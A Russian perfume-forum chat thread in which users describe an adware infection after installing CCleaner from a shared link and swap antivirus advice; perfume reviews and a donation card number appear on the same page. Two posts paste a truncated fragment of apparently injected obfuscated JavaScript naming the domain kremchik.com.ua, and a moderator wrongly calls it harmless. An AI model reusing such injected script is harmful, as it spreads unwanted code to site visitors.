Модератор темы: Nathalie-art

Общаемся между собой на самые разные темы :tancy:

Сообщения не должны нарушать Общие правила сайта/форума.

Дополнение от 18.02.2015

Все спорные моменты сначала решаем со своими покупателями/продавцами в личке или по телефону! И только после детального «разбора полётов» и ОСОЗНАНИЯ масштаба РЕАЛЬНОЙ проблемы выносим её в Беседку! Без оглашения ника оппонента и публикации переписки!!! Оглашать ник и публиковать переписку можно только с согласия вашего оппонента или после согласования с администрацией сайта!

Номер карты для перевода денег на лечение больной собаки: 5168755623878655 - андрусив богдана

-

Читать полностью

Беседка

количество комментариев: 16379

Количество просмотров: 1217610

Данный раздел просматривают:

Написать комментарии в форуме могут только зарегистрированные пользователи

Ответ для: may_1185

Спросите Вашего мастера, почему у вас нет АКТИВНОЙ защиты в виде антивирусной, почему лечится приходится уже после, а не предупреждать заражение системы?

Кстати, "Наверное, просто не стоит давать таких ссылок, или по крайней мере, писать, - что они могут нанести вред вашему компьютеру и вся ответственность за установление программ лежит на пользователе. "

Хорошая аналогия: "говорят секс довольно приятная штука, и даже во время него получают удовольствие"

А Вы не знали, что ДО начала надо изучить партнера (прочитать, что вам предлагает программа ДО установки)

выслушать пожелания вашего партнера и его намерения, как это будет происходить и что из этого получится, вы соглашаетесь на это или нет (ознакомиться с дополнительными приложениями, которые предлагается установить, если не требуется отменить данные опции)

И только после ВАШЕГО согласия на все или выборочно происходит сам процесс.

И все таки, что обезопасить себя, всегда стоит использовать средства защиты, а не лечиться самой или лечить компьютер!

количество респектов: 6

Ответ для: zloy_admin

у меня все прекрасно стояло. И все прекрасно работало до вчерашнего вечера. Все устанавливал мастер. Я не касаюсь этого. Наверное, просто не стоит давать таких ссылок, или по крайней мере, писать, - что они могут нанести вред вашему компьютеру и вся ответственность за установление программ лежит на пользователе. 

не все ж такие умные, как вы. Я лично сделала все согласно инструкций, которые были при установке, и, если бы не мой мастер (спасибо ему огромное за ночную консультацию), мои нервы бы сдали!

количество респектов: 3

Цитата: may_1185

Ответ для: alisia

Походу, я вчера не одна воспользовались чудо-ссылкой, которую дал Денис!))) поздравляю!!!)) надо все прогнать хорошим антивмрусником , если у тебя есть. Сейчас еще добавится куча всплывающих окон

Может, пора научится читать и не ставить параллельно всю рекламу, которая предлагается установить?

при установки галочки снимать надо с  тех модулей, которые вам не нужны.

И антивирус должен стоять постоянно на компьютере и быть постоянно в АКТИВНОМ режиме, а не такой, который вы запускаете специально, когда уже заразитесь.

количество респектов: 8

Не смотря на то, что CCleaner стоит у меня уже много лет, специально перешла по ссылке Дениса и заново установила эту программу-никакого мусора или вирусов там НЕТ!!!

количество респектов: 3

Ответ для: alisia

Походу, я вчера не одна воспользовались чудо-ссылкой, которую дал Денис!))) поздравляю!!!)) надо все прогнать хорошим антивмрусником , если у тебя есть. Сейчас еще добавится куча всплывающих окон

количество респектов: 1

Все, кто не умеет внимательно загружать программы, скачайте и установите вот эту программку http://unchecky.com/  -называется "антигалочник" .Она очень легкая, занимает мало места и очень проста в понимании.

И каждый раз, когда собираетесь что-либо скачивать с инета-обязательно вначале открывайте эту программу-тогда у вас не будет  автоматом закачиваться весь мусор!!!Программа проверенная, сайт тоже чистый.

количество респектов: 8

девочки а как теперь это почистить?постоянно всплывают эти надписи 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kremchik.com.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

и у меня на рабочем столе появилось кучу игр,каких то страниц.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kremchik.com.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Странно... Ну, всякое бывает!

Хорошо, что избавилась!

Ответ для: Nathalie-art

да не, натали, - там с ССклинером подгрузилось куча вирусняков! только что звонила мастеру он мне ЦУ давал в телефоном режиме! вроде все поустанавливала и удалила ту хрень. и фото должно грузится теперь

а вот все эти краказябры - это вирусня, они параллельно с всплывающими окнами идут

Это не связано никак с СиКлинером. СиКлинер - отличная программа, которой я пользуюсь уже много лет на всех моих компьютерах. Все эти символы - это программный протокол, который вирусом не является и не угрожает твоему компьютеру. Напиши Денису, пусть он посмотрит, в чём дело! Я эту проблему вижу уже очень давно, не менее полугода, у разных пользователей.

Я когда сегодня по этой ссылке зашла,то вылезло предупреждение о том ,что этот сайт может угрожать компьютеру.Благо муж вовремя вмешался ,оказалось,что такая программа уже закачана на мой комп.

Ответ для: Svetikss

перешла по ссылке, которую денис жирным шрифтом выделил... 

Надя, ты где столько всякой к-ки нагреблавирус что ли ?

дайте ссылку на программу по  удаление всплывающих окон... очистила одна кеши.((((((((((((((

Вы просмотрели:

Новые комментарии

Arriva
20 Января 2017 13:15

Отзыв о Антигрусть

Маршрут 85.

Мыло, полностью, оправдывает свое название. Вызывает теплые воспоминания о лете, благодаря едва уловимому аромату обожаемой мною дыньки. Хорошо мылится. Единственное, что кожа после принятия душа, оказалась чуть подсушенной. Пришлось использовать молочко для тела.

Спасибо, Наташа, за знакомство с продуктом.

Ksenya
20 Января 2017 12:21

Отзыв о Lalique Le Parfum

Маршрут 73

Аромат яркий, цветочный, пряный с легкой горчинкой лавра.Очень шлейфовый, стойкий , на холодное время года.Нравится! Спасибо за предоставленный аромат M_a_r_i_i_n!

ValeraQuare
20 Января 2017 12:21

Отзыв о Prada Infusion d'Homme

Сегодня после бритья накинул его и белую рубашку. Пудра и ветивер. Не любитель пудровых нот, особенно в мужских ароматах, но эта Прада настолько солидно сидит, что под рубашку и выбритое лицо идеально заходит. Ещё мне пахнет хорошим мылом без запаха. Запах чистоты. Я бы назвал его интеллигентным ароматом. Очень стойкий.

Mart_Ventrue
20 Января 2017 12:14

Отзыв о Stephane Humbert Lucas 777 Une Nuit a Doha

Маршрут 67

Единственный со всего маршрута, которого с которым я знакома до прохождения, а еще входит в пятерку моих самых любимых ароматов. Очень красивый знойный аромат. Шикарно обыгранный бессмертник в окружении не приторной ванили, спокойного мандарина, с небольшим вкраплением табака и имбиря. Уникальный и неподражаемый аромат, отрабатывает каждый доллар своей стоимости. А еще он все сезонный, и в при каждой погоде звучит по-разному, но всегда прекрасно, стойкость и насыщенность, независимо от погоды и времени года, на высоте, а вот шлейф небольшой, но сама наслаждаюсь им сутки без обновления. Ночь в Дохе - один из тех ароматов, который меняет свое раскрытие, как хамелеон

Загрузка...
Наверх